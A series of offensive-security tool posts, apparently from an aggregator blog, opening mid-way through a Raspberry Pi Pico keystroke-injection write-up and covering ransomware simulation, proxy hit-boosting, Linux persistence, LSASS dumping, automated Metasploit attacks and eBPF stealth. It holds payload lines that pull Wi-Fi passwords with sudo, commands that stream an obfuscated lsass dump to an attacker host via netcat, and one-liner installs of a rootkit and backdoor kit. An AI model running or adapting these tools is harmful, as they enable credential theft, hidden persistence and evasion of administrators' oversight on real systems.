
In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses the .ini-style keyfile format to store network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex to extract the data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion matches at a certain position in the string, i.e. at a position right after the keyword, without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
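
As a quick illustration with a hypothetical keyfile name and made-up values, the two extractions look like this:

$ sudo grep -oP '(?<=ssid=).*' /etc/NetworkManager/system-connections/HomeWiFi
HomeWiFi
$ sudo grep -oP '(?<=psk=).*' /etc/NetworkManager/system-connections/HomeWiFi
secret123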

For more information about NetworkManager, here are some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees is a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy; actually, it's quite the opposite: it's really bulky, especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


RansomwareSim - A Simulated Ransomware

By: Zion3R
3 January 2024 at 11:30

Overview

RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.

Features

  • Encrypts specified file types within a target directory.
  • Changes the desktop wallpaper (Windows only).
  • Creates and deletes a README file on the desktop with a simulated ransom note.
  • Simulates communication with a command-and-control server to send system data and receive a decryption key.
  • Decrypts files after receiving the correct key.
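
Since the tool is Python and depends on the cryptography package, the core encrypt/decrypt round trip behind the feature list above can be sketched in a few lines. This is illustrative only, not RansomwareSim's actual code; the file name is made up:

# Minimal sketch of the encrypt/decrypt round trip (illustrative, not RansomwareSim's code)
from pathlib import Path
from cryptography.fernet import Fernet

key = Fernet.generate_key()        # in the simulated C2 flow, the server would hold this key
cipher = Fernet(key)

target = Path("demo.txt")          # hypothetical file in a controlled lab directory
target.write_text("hello")

target.write_bytes(cipher.encrypt(target.read_bytes()))   # "ransom" step
target.write_bytes(cipher.decrypt(target.read_bytes()))   # recovery with the correct key
assert target.read_text() == "hello"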

Usage

Important: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE

Requirements

  • Python 3.x
  • cryptography
  • colorama

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/RansomwareSim.git
  2. Navigate to the project directory:

    cd RansomwareSim
  3. Install the required dependencies:

    pip install -r requirements.txt


Running the Control Server

  1. Open controlpanel.py.
  2. Start the server by running controlpanel.py.
  3. The server will listen for connections from RansomwareSim and the Decoder.

Running the Simulator

  1. Navigate to the directory containing RansomwareSim.
  2. Modify the main function in encoder.py to specify the target directory and other parameters.
  3. Run encoder.py to start the encryption process.
  4. Follow the instructions displayed on the console.

Running the Decoder

  1. Run decoder.py after the files have been encrypted.
  2. Follow the prompts to input the decryption key.

Disclaimer

RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.

Contributing

Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:



PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

By: Zion3R
4 January 2024 at 11:30


PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

Features:

  • Utilizes a list of proxy IP addresses from a specified file.
  • Supports both HTTP and HTTPS proxies.
  • Allows users to input the target website URL, proxy file path, and a static port.
  • Makes HTTP requests to the specified website using each proxy.
  • Parses HTML content to extract and visit links on the webpage.
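
In outline, the request-and-parse loop the feature list above describes can be sketched like this (illustrative only; the URL and proxy are placeholders, not the tool's actual code):

# Illustrative sketch of the crawl loop, not PhantomCrawler's actual code
import requests
from bs4 import BeautifulSoup

url = "https://example.com"          # placeholder target
proxies = ["50.168.163.176:80"]      # same format as proxies.txt

for proxy in proxies:
    try:
        resp = requests.get(url,
                            proxies={"http": f"http://{proxy}", "https": f"http://{proxy}"},
                            timeout=10)
        # extract and count the links on the page
        links = [a["href"] for a in BeautifulSoup(resp.text, "html.parser").find_all("a", href=True)]
        print(f"{proxy} -> {resp.status_code}, {len(links)} links")
    except requests.RequestException as exc:
        print(f"{proxy} failed: {exc}")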

Usage:

  • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
  • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
  • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
  • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
  • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

Get new proxies (with ports) and add them to proxies.txt in this format: 50.168.163.176:80
  • You can get them from here: https://free-proxy-list.net/. These free proxies are not validated and some might not work, so validate them first before adding.

How to Use:

  1. Clone the repository:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
  2. Install dependencies:
pip3 install -r requirements.txt
  3. Run the script:
python3 PhantomCrawler.py

Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


Snapshots:

If you find this GitHub repo useful, please consider giving it a star! 



D3m0n1z3dShell - Demonized Shell Is An Advanced Tool For Persistence In Linux

By: Zion3R
5 January 2024 at 11:30


Demonized Shell is an advanced tool for persistence in Linux.


Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

One-Liner Install

Download D3m0n1z3dShell with all files:

curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh

Load D3m0n1z3dShell statically (without the static-binaries directory):

sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM Rootkit with file encoder, persistent ICMP backdoor and other features
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static Binaries for process monitoring, credential dumping, enumeration, trolling and other purposes

Pending Features

  • LD_PRELOAD Rootkit
  • Process Injection
  • install for example: curl github.com/test/test/demonized.sh | bash
  • Static D3m0n1z3dShell
  • Intercept Syscall Write from a file
  • ELF/Rootkit Anti-Reversing Technique
  • PAM Backdoor
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence
  • Persistence via php webshell and aspx webshell

And other types of features that will come in the future.

Contribution

If you want to contribute and help with the tool, please contact me on twitter: @MatheuzSecurity

Note

We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.



Valid8Proxy - Tool Designed For Fetching, Validating, And Storing Working Proxies

By: Zion3R
6 January 2024 at 11:30


Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.


Features:

  1. Proxy Fetching: Retrieve proxies from popular proxy sources with a single command.
  2. Proxy Validation: Efficiently validate proxies using multithreading to save time.
  3. Save to File: Save the list of validated proxies to a file for future use.

Usage:

  1. Clone the Repository:

    git clone https://github.com/spyboy-productions/Valid8Proxy.git
  2. Navigate to the Directory:

    cd Valid8Proxy
  3. Install Dependencies:

    pip install -r requirements.txt
  4. Run the Tool:

    python Valid8Proxy.py
  5. Follow Interactive Prompts:

    • Enter the number of proxies you want to print.
    • Sit back and let Valid8Proxy fetch, validate, and display working proxies.
  6. Save to File:

    • At the end of the process, Valid8Proxy will save the list of working proxies to a file named "proxies.txt" in the same directory.
  7. Check Results:

    • Review the working proxies in the terminal with color-coded output.
    • Find the list of working proxies saved in "proxies.txt."

If you already have proxies and just want to validate them, use this:

python Validator.py

Follow the prompts:

Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.
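
Conceptually, the multithreaded validation step looks something like the sketch below (not Valid8Proxy's actual code; the check URL is an arbitrary choice):

# Illustrative multithreaded proxy check, not Valid8Proxy's actual code
from concurrent.futures import ThreadPoolExecutor
import requests

def is_alive(proxy: str) -> bool:
    """Return True if an HTTP GET through the proxy succeeds."""
    try:
        r = requests.get("https://httpbin.org/ip",   # arbitrary reachability check
                         proxies={"http": f"http://{proxy}", "https": f"http://{proxy}"},
                         timeout=5)
        return r.ok
    except requests.RequestException:
        return False

proxies = open("proxy_list.txt").read().split()
with ThreadPoolExecutor(max_workers=20) as pool:
    valid = [p for p, ok in zip(proxies, pool.map(is_alive, proxies)) if ok]
print("\n".join(valid))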

Contribution:

Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.

Snapshots:

If you find this GitHub repo useful, please consider giving it a star!



PPLBlade - Protected Process Dumper Tool

By: Zion3R
7 January 2024 at 11:30


Protected process dumper tool that supports obfuscating memory dumps and transferring them to remote workstations without dropping them onto the disk.

Key functionalities:

  1. Bypassing PPL protection
  2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
  3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)

Overview of the techniques, used in this tool can be found here: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred to the target machine alongside PPLBlade.exe.

It’s already embedded into the PPLBlade.exe. The exploit is just a single executable.

Modes:

  1. Dump - Dump process memory using PID or Process Name
  2. Decrypt - Revert obfuscated(--obfuscate) dump file to its original state
  3. Cleanup - Do cleanup manually, in case something goes wrong during execution (note that the option values should be the same as for the execution we're trying to clean up)
  4. DoThatLsassThing - Dump lsass.exe using Process Explorer driver (basic poc)

Handle Modes:

  1. Direct - Opens PROCESS_ALL_ACCESS handle directly, using OpenProcess() function
  2. Procexp - Uses PROCEXP152.sys to obtain a handle

Examples:

Basic POC that uses PROCEXP152.sys to dump lsass:

PPLBlade.exe --mode dothatlsassthing

(Note that it does not XOR the dump file by default; provide the additional --obfuscate flag to enable the XOR functionality)

Upload the obfuscated LSASS dump onto a remote location:

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Attacker host:

nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Deobfuscate memory dump:

PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
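
The README only says the dump is XORed with the --key value, so a deobfuscation sketch under that assumption (a repeating-key XOR, which is its own inverse) would be:

# Hypothetical sketch assuming a simple repeating-key XOR; deobfuscate.py holds the real logic
from itertools import cycle

key = b"PPLBlade"                                  # the --key value from the example above
data = open("PPLBlade.dmp", "rb").read()
plain = bytes(b ^ k for b, k in zip(data, cycle(key)))
open("PPLBlade.decrypted.dmp", "wb").write(plain)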


CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

By: Zion3R
8 January 2024 at 11:30


CATSploit is an automated penetration testing tool using the Cyber Attack Techniques Scoring (CATS) method that can be used without a pentester. Currently, pentesters implicitly select the suitable attack techniques for the target systems to be attacked. CATSploit uses system configuration information such as OS, open ports and software versions collected by a scanner, and calculates score values for capture (eVc) and detectability (eVd) of each attack technique for the target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack (a professional pentester's skill).

CATSploit automatically performs penetration tests in the following sequence:

  1. Information gathering and prior information input: First, CATSploit gathers information about the target systems. It supports nmap and OpenVAS for information gathering, and also accepts prior information about the target systems if you have it.

  2. Calculating score values of attack techniques: Using the information obtained in the previous phase and the attack techniques database, the evaluation values of capture (eVc) and detectability (eVd) of each attack technique are calculated, for each target computer.

  3. Selecting attack techniques and building an attack scenario: Attack techniques are selected and attack scenarios created according to pre-defined policies. For example, for a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) will be selected.

  4. Executing the attack scenario: CATSploit executes the attack techniques according to the attack scenario constructed in the previous phase. It uses Metasploit as a framework and the Metasploit API to execute actual attacks.


Prerequisites

CATSploit has the following prerequisites:

  • Kali Linux 2023.2a

Installation

Metasploit, Nmap and OpenVAS are assumed to be installed with the Kali distribution.

Installing CATSploit

To install the latest version of CATSploit, please use the following commands:

Cloning and setup
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh

Editing configuration file

CATSploit has a server-client architecture, and the server reads a configuration JSON file at startup. In config.json, the following fields should be modified for your environment.

  • DBMS
    • dbname: database name created for CATSploit
    • user: username of PostgreSQL
    • password: password of PostgreSQL
    • host: If you are using a database on a remote host, specify the IP address of the host
  • SCENARIO
    • generator.maxscenarios: Maximum number of scenarios to calculate (*)
  • ATTACKPF
    • msfpassword: password of MSFRPCD
    • openvas.user: username of PostgreSQL
    • openvas.password: password of PostgreSQL
    • openvas.maxhosts: Maximum number of hosts to be tested at the same time (*)
    • openvas.maxchecks: Maximum number of test items to be run at the same time (*)
  • ATTACKDB
    • attack_db_dir: Path to the folder where AtackSteps are stored

(*) Adjust the number according to the specs of your machine.
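
For orientation, a filled-in config.json might look like the sketch below. All values are illustrative and the exact nesting is an assumption based on the field list above, so compare against the shipped config.json:

{
  "DBMS": {
    "dbname": "catsploit",
    "user": "postgres",
    "password": "CHANGEME",
    "host": "localhost"
  },
  "SCENARIO": {
    "generator.maxscenarios": 30
  },
  "ATTACKPF": {
    "msfpassword": "CHANGEME",
    "openvas.user": "admin",
    "openvas.password": "CHANGEME",
    "openvas.maxhosts": 5,
    "openvas.maxchecks": 10
  },
  "ATTACKDB": {
    "attack_db_dir": "/path/to/attack_steps"
  }
}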

Usage

To start the server, execute the following command:

$ python cats_server.py -c [CONFIG_FILE]

Next, prepare another console, start the client program, and initiate a connection to the server.

$ python catsploit.py -s [SOCKET_PATH]

After successfully connecting to the server and initializing it, the session will start.

   _________  ___________       __      _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/

[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>

The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}

options:
-h, --help show this help message and exit

I've posted the commands and options below as well for reference.

host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit

host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit

scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit

scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit

scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] target_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned

plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit

attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute

options:
-h, --help show this help message and exit

post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
options:
-h, --help show this help message and exit

reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit

exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit

Examples

In this example, we use CATSploit to scan the network, plan an attack scenario, and execute the attack.

catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┡━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
│ attacker │ 0.0.0.0 │ kali │ kali 2022.4 │ True │
│ h_exbiy6 │ 192.168.0.10 │ │ Linux 3.10 - 4.11 │ False │
│ h_nhqyfq │ 192.168.0.20 │ │ Microsoft Windows 7 SP1 │ False │
└──────────┴────────────────┴──────────┴──────────────────────────────────┴───────┘


catsploit> host detail h_exbiy6
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┡━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
│ h_exbiy6 │ 192.168.0.10 │ ubuntu │ ubuntu 14.04 │ False │
└──────────┴──────────────┴──────────┴──────────────┴───────┘

[IP address]
┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
┃ ipv4 ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
┡━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
│ 192.168.0.10 │ │ │ │
└──────────────┴──────────┴──────┴────────────┘

[Open ports]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ service ┃ product ┃ version ┃
┡━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp │ 21 │ ftp │ ProFTPD │ 1.3.5 │
│ 192.168.0.10 │ tcp │ 22 │ ssh │ OpenSSH │ 6.6.1p1 Ubuntu 2ubuntu2.10 │
│ 192.168.0.10 │ tcp │ 80 │ http │ Apache httpd │ 2.4.7 │
│ 192.168.0.10 │ tcp │ 445 │ netbios-ssn │ Samba smbd │ 3.X - 4.X │
│ 192.168.0.10 │ tcp │ 631 │ ipp │ CUPS │ 1.7 │
└──────────────┴───────┴──────┴─────────────┴──────────────┴────────────────────────────┘

[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ vuln_name ┃ cve ┃
┡━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp │ 0 │ TCP Timestamps Information Disclosure │ N/A │
│ 192.168.0.10 │ tcp │ 21 │ FTP Unencrypted Cleartext Login │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak MAC Algorithm(s) Supported (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak Encryption Algorithm(s) Supported (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak Host Key Algorithm(s) (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Test HTTP dangerous methods │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check │ CVE-2014-3704 │
│ 192.168.0.10 │ tcp │ 80 │ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Sensitive File Disclosure (HTTP) │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Unprotected Web App / Device Installers (HTTP) │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Cleartext Transmission of Sensitive Information via HTTP │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ jQuery < 1.9.0 XSS Vulnerability │ CVE-2012-6708 │
│ 192.168.0.10 │ tcp │ 80 │ jQuery < 1.6.3 XSS Vulnerability │ CVE-2011-4969 │
│ 192.168.0.10 │ tcp │ 80 │ Drupal 7.0 Information Disclosure Vulnerability - Active Check │ CVE-2011-3730 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS │ CVE-2016-2183 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS │ CVE-2016-6329 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS │ CVE-2020-12872 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection │ CVE-2011-3389 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection │ CVE-2015-0204 │
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴────────────────┘

[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┡━━━━━━━━━━━╇━━━━━━━┩
└───────────┴───────┘


catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃ steps ┃ first attack step ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 3d3ivc │ 0.0.0.0 │ 192.168.0.10 │ 1.0 │ 32.0 │ 1 │ exploit/multi/http/jenkins_s… │
│ 5gnsvh │ 0.0.0.0 │ 192.168.0.10 │ 1.0 │ 53.76 │ 2 │ exploit/multi/http/jenkins_s… │
│ 6nlxyc │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 48.32 │ 2 │ exploit/multi/http/jenkins_s… │
│ 8jos4z │ 0.0.0.0 │ 192.168.0.10 │ 0.7 │ 72.8 │ 2 │ exploit/multi/http/jenkins_s… │
│ 8kmmts │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 32.0 │ 1 │ exploit/multi/elasticsearch/… │
│ agjmma │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 24.0 │ 1 │ exploit/windows/http/managee… │
│ joglhf │ 0.0.0.0 │ 192.168.0.10 │ 70.0 │ 60.0 │ 1 │ auxiliary/scanner/ssh/ssh_lo… │
│ rmgrof │ 0.0.0.0 │ 192.168.0.10 │ 100.0 │ 32.0 │ 1 │ exploit/multi/http/drupal_dr… │
│ xuowzk │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 24.0 │ 1 │ exploit/multi/http/struts_dm… │
│ yttv51 │ 0.0.0.0 │ 192.168.0.10 │ 0.01 │ 53.76 │ 2 │ exploit/multi/http/jenkins_s… │
│ znv76x │ 0.0.0.0 │ 192.168.0.10 │ 0.01 │ 53.76 │ 2 │ exploit/multi/http/jenkins_s… │
└─────────────┴─────────────┴────────────────┴───────┴───────┴───────┴───────────────────────────────┘

catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
│ 0.0.0.0 │ 192.168.0.10 │ 100.0 │ 32.0 │
└─────────────┴────────────────┴───────┴──────┘

[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
┃ # ┃ step ┃ params ┃
┡━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
│ 1 │ exploit/multi/http/drupal_drupageddon │ RHOSTS: 192.168.0.10 │
│ │ │ LHOST: 192.168.10.100 │
└───┴───────────────────────────────────────┴───────────────────────┘


catsploit> attack rmgrof
> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!


catsploit> exit
Bye.

Disclaimer

All information and code are provided solely for educational purposes and/or for testing your own systems.

Contact

For any inquiry, please contact the email address as follows:

[email protected]



Nysm - A Stealth Post-Exploitation Container

By: Zion3R
9 January 2024 at 11:30


A stealth post-exploitation container.

Introduction

With the rise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of system administrators, not only by hiding eBPF, but much more:

  • bpftool
  • bpflist-bpfcc
  • ps
  • top
  • sockstat
  • ss
  • rkhunter
  • chkrootkit
  • lsof
  • auditd
  • etc...

All these tools go blind to what goes through nysm. It hides:

  • New eBPF programs
  • New eBPF maps
  • New eBPF links
  • New Auditd generated logs
  • New PIDs
  • New sockets

Warning: This tool is a simple demonstration of eBPF capabilities and, as such, is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.

 

Installation

Requirements

sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

Linux headers

cd ./nysm/src/
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

Build

cd ./nysm/src/
make

Usage

nysm is a simple program to run before the intended command:

Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

-d, --detach Run COMMAND in background
